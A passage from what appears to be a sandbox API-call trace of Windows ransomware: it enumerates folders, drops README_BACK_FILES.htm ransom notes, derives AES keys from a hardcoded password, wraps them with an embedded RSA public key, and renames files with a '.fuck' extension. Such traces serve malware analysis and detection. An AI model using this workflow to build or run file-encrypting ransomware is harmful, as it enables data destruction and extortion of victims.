Users\\Microsoft\\Crypto\\SystemKeys\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\systemkeys\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.560] GetLastError () returned 0x5 [0239.560] GetLastError () returned 0x5 [0239.560] FindNextFileA (in: hFindFile=0x28bee58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.560] FindClose (in: hFindFile=0x28bee58 | out: hFindFile=0x28bee58) returned 1 [0239.560] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\readme_back_files.htm")) returned 0xffffffff [0239.560] AreFileApisANSI () returned 1 [0239.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd2b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 59 [0239.560] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Crypto\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\crypto\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.560] GetLastError () returned 0x5 [0239.560] GetLastError () returned 0x5 [0239.561] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.561] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\DataMart\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bebd8 [0239.561] FindNextFileA (in: hFindFile=0x28bebd8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.561] FindNextFileA (in: hFindFile=0x28bebd8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.561] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bf098 [0239.561] FindNextFileA (in: hFindFile=0x28bf098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.561] FindNextFileA (in: hFindFile=0x28bf098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.561] FindNextFileA (in: hFindFile=0x28bf098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0239.561] FindClose (in: hFindFile=0x28bf098 | out: hFindFile=0x28bf098) returned 1 [0239.561] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\DataMart\\PaidWiFi\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\datamart\\paidwifi\\readme_back_files.htm")) returned 0x20 [0239.561] FindNextFileA (in: hFindFile=0x28bebd8, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0239.561] FindClose (in: hFindFile=0x28bebd8 | out: hFindFile=0x28bebd8) returned 1 [0239.562] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\DataMart\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\datamart\\readme_back_files.htm")) returned 0xffffffff [0239.562] AreFileApisANSI () returned 1 [0239.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd388, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0239.562] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft\\DataMart\\README_BACK_FILES.htm" (normalized: "c:\\users\\all users\\microsoft\\datamart\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.562] GetLastError () returned 0x5 [0239.562] GetLastError () returned 0x5 [0239.562] FindNextFileA (in: hFindFile=0x282df78, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0239.562] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x28bee18 [0239.562] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.562] FindNextFileA (in: hFindFile=0x28bee18, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0239.562] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x28bea98 [0239.563] FindNextFileA (in: hFindFile=0x28bea98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.563] FindNextFileA (in: hFindFile=0x28bea98, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.563] FindFirstFileA (in: lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28beb58 [0239.563] FindNextFileA (in: hFindFile=0x28beb58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.563] FindNextFileA (in: hFindFile=0x28beb58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.563] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.563] GetLastError () returned 0x5 [0239.564] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png")) returned 0x20 [0239.564] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", dwFileAttributes=0x80) returned 0 [0239.564] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.564] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.565] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg", dwFileAttributes=0x2) returned 0 [0239.565] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.567] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.567] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.567] CryptHashData (hHash=0x28bee98, pbData=0x2856ea8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.567] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bee98, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28beed8) returned 1 [0239.567] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.567] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.567] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28ad8a0) returned 1 [0239.567] CryptImportPublicKeyInfo (in: hCryptProv=0x28ad8a0, dwCertEncodingType=0x1, pInfo=0x28998d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2899900*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2899908*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bebd8) returned 1 [0239.568] CryptEncrypt (in: hKey=0x28bebd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.568] CryptEncrypt (in: hKey=0x28bebd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ad928*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28ad928*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.568] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ad928, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.568] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.568] CryptEncrypt (in: hKey=0x28beed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.568] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.568] CloseHandle (hObject=0xffffffff) returned 1 [0239.568] CloseHandle (hObject=0xffffffff) returned 1 [0239.568] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), bFailIfExists=0) returned 0 [0239.568] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", dwFileAttributes=0x0) returned 0 [0239.569] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.gsg")) returned 0 [0239.569] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png.fuck")) returned 0 [0239.569] CryptDestroyHash (hHash=0x28bee98) returned 1 [0239.569] CryptDestroyKey (hKey=0x28beed8) returned 1 [0239.569] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.569] FindNextFileA (in: hFindFile=0x28beb58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.570] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.570] GetLastError () returned 0x5 [0239.570] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml")) returned 0x20 [0239.570] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", dwFileAttributes=0x80) returned 0 [0239.570] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.570] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.571] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.571] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.573] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.573] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.573] CryptHashData (hHash=0x28bf118, pbData=0x2856e08, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.573] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bf118, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bef58) returned 1 [0239.573] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.573] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.573] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28ade78) returned 1 [0239.574] CryptImportPublicKeyInfo (in: hCryptProv=0x28ade78, dwCertEncodingType=0x1, pInfo=0x28994c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28994f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28994f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bf058) returned 1 [0239.574] CryptEncrypt (in: hKey=0x28bf058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.574] CryptEncrypt (in: hKey=0x28bf058, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ae098*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28ae098*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.574] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ae098, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.574] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.574] CryptEncrypt (in: hKey=0x28bef58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.574] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.574] CloseHandle (hObject=0xffffffff) returned 1 [0239.574] CloseHandle (hObject=0xffffffff) returned 1 [0239.574] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), bFailIfExists=0) returned 0 [0239.575] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml", dwFileAttributes=0x0) returned 0 [0239.575] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.gsg")) returned 0 [0239.575] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\behavior.xml.fuck")) returned 0 [0239.576] CryptDestroyHash (hHash=0x28bf118) returned 1 [0239.576] CryptDestroyKey (hKey=0x28bef58) returned 1 [0239.576] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.576] FindNextFileA (in: hFindFile=0x28beb58, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0239.576] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0239.576] GetLastError () returned 0x5 [0239.576] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png")) returned 0x20 [0239.576] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png", dwFileAttributes=0x80) returned 0 [0239.576] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.577] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.577] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg", dwFileAttributes=0x2) returned 0 [0239.577] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28ab150) returned 1 [0239.579] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0239.579] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.579] CryptHashData (hHash=0x28bf118, pbData=0x2857060, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.579] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x28bf118, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28bec18) returned 1 [0239.579] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.579] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0239.579] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x28ad708) returned 1 [0239.580] CryptImportPublicKeyInfo (in: hCryptProv=0x28ad708, dwCertEncodingType=0x1, pInfo=0x28990b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x28990e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x28990e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28bef58) returned 1 [0239.580] CryptEncrypt (in: hKey=0x28bef58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0239.580] CryptEncrypt (in: hKey=0x28bef58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ad818*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x28ad818*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0239.580] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ad818, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.580] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0239.580] CryptEncrypt (in: hKey=0x28bec18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0239.580] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0239.580] CloseHandle (hObject=0xffffffff) returned 1 [0239.580] CloseHandle (hObject=0xffffffff) returned 1 [0239.580] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\device.png" (normalized: "c:\\users\\all users\\microsoft\\device 